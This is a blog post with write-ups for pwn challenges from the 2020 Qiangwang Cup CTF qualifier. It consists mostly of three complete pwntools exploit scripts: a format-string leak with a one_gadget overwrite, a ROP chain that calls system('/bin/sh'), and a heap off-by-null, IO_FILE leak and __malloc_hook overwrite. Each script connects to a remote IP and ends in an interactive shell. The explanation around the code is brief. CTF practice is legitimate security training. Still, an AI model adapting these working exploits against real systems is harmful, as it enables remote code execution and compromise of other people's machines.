HackPluto's Blog

2020强网杯线上赛pwn题解

字数统计: 746阅读时长: 4 min
2020/08/23 Share
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
#coding=utf8
from pwn import *
context.log_level = "debug"

p = remote("123.56.170.202",12124)
#p = process("Siri")
lib = ELF("libc.so.6")

def fmtstr(payload):
p.recvuntil(">>> ")
p.sendline("Hey Siri!")
p.recvuntil("What Can I do for you?\n")
p.sendline("Remind me to "+payload)

def fmt(prev, word, index):
if prev < word:
result = word - prev
fmtstr = "%" + str(result) + "d"
elif prev == word:
fmtstr = ""
result = 0
else:
result = 65536 + word - prev
fmtstr = "%" + str(result) + "d"
fmtstr += "%" + str(index) + "$hn"
return fmtstr

#leak stack addr
fmtstr("%7$p")
p.recvuntil("OK, I'll remind you to ")
rbp = int(p.recvuntil("\n",True),16) - 0x10
success("[*]RBP addr :"+hex(rbp))

#leak libc
fmtstr("%83$p")
p.recvuntil("OK, I'll remind you to ")
libc = int(p.recvuntil("\n",True),16) - 231 - lib.symbols['__libc_start_main']
success("[*]libc addr :"+hex(libc))
one_gadget = libc + 0x10a45c
success("[*]one_gadget addr :"+hex(one_gadget))

#return one_gadget
pay1 = ""
prev = 27+4
for i in range(3):
pay1 += fmt(prev,(one_gadget>>i*16)&0xffff,55+i)
prev = (one_gadget>>i*16)&0xffff

pay1 += p64(rbp+8) + p64(rbp+10) + p64(rbp+12)
print len(pay1)
pause()
p.recvuntil(">>> ")
p.sendline("Hey Siri!")
p.recvuntil("What Can I do for you?\n")
#gdb.attach(p)
#pause()
p.sendline("Remind me to aaaa"+pay1)
p.recv()

p.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#coding=utf8
from pwn import *
context.log_level = "debug"

p = remote("123.56.170.202",21342)
#p = process("babymessage")
libc = ELF("libc-2.27.so")
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF("babymessage")


leave_mes = 0x000000000400995
name_addr = 0x00000000006010D0
pop_rdi = 0x0000000000400ac3
puts_got = elf.got['puts']
puts_addr = elf.plt['puts']


#change v1
p.sendlineafter("choice:","1")
p.sendline("999")
p.sendlineafter("choice:","2")
p.sendline("bbbbbbbb"+p64(name_addr+4))

#leak libc
p.sendlineafter("choice:","2")
payload1 = "a"*8+p64(name_addr+4)+p64(pop_rdi)+p64(puts_got)+p64(puts_addr)+p64(leave_mes)
p.sendline(payload1)

libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,"\x00")) - libc.symbols['puts']
success("[*]libc base :"+hex(libc_base))

#get shell
system_addr = libc_base + libc.symbols['system']
binsh = libc_base + libc.search("/bin/sh").next()
payload1 = "a"*8+p64(name_addr+4)+p64(pop_rdi)+p64(binsh) + p64(system_addr)
#gdb.attach(p)
#pause()
p.sendline(payload1)
p.interactive()

easypwn

程序保护全开

1
2
3
4
5
Arch:     amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled

1
2
if ( !mallopt(1, 0) )
exit(-1);

mallopt(M_MXFAST,0)将global_max_fast设置为0,这个值的意思是最大为多大的chunk归fastbin管理,设置为0表示这个程序中不再存在fastbin。即本程序禁用了fastbin。

漏洞点:

zoeXML

edit函数处存在off-by-null漏洞

但是这个题没有show函数,需要改写IO File,达到leak libc的效果,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
#-*- coding: utf-8 -*-
from pwn import *
context.arch='amd64'
#context.log_level = 'debug'

while(1):
try:
p = remote('39.101.184.181',10000)
#p = process("easypwn")
elf = ELF("easypwn")
#libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
libc = ELF("libc-easypwn.so")

def add(size):
p.sendlineafter("Your choice:","1")
p.sendlineafter("size:",str(size))

def edit(index,mes):
p.sendlineafter("Your choice:","2")
p.sendlineafter("idx:",str(index))
p.sendafter("content:",mes)

def free(index):
p.sendlineafter("Your choice:","3")
p.sendlineafter("idx:",str(index))

add(0xf8)#0
add(0x68)#1
add(0xf8)#2
add(0xf8)#3
add(0x88)#4
add(0xf8)#5
add(0x68)#6
add(0x68)#7
add(0x68)#8
free(0)
edit(1,"a"*0x60+p64(0x70+0x100))
free(2)
add(0xf8)#0
add(0x68)#2-->1
add(0xf8)#9
free(3)
edit(4,"a"*0x80+p64(0x90+0x100))
free(5)
add(0xf8)
add(0x88)#5-->4
add(0xf8)#10
free(7)
add(0x68)
free(4)
edit(5,p64(0)+p16(0x37f8-0x10-0x5)+'\n')
add(0x88)
print "Success unsortedbin attrack"
free(6)
free(1)
edit(2,p8(0x70)+'\n')
edit(7,p16(0x25dd)+'\n')
add(0x68)#1
add(0x68)#6
add(0x68)#11

pay1 = "\x00"*0x33+p64(0xfbad1887)+p64(0)*3+p8(0)+'\n'
edit(11,pay1)
libc_base = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-0x3c5600
pause()
p.success("libc_base: "+str(hex(libc_base)))
free(6)
free(1)
edit(2,p64(libc_base+libc.sym["__malloc_hook"]-0x23)+'\n')
add(0x68)
add(0x68)

#o_g = [0x45226,0x4527a,0xf0364,0xf1207]
o_g = [0x45226,0x4527a,0xf0364,0xf1207]
edit(6,"a"*0x13+p64(o_g[2]+libc_base)+'\n')
# gdb.attach(p)
add(0x100)
p.interactive()
except:
continue
CATALOG
  1. 1. easypwn
    1. 1.1. 漏洞点: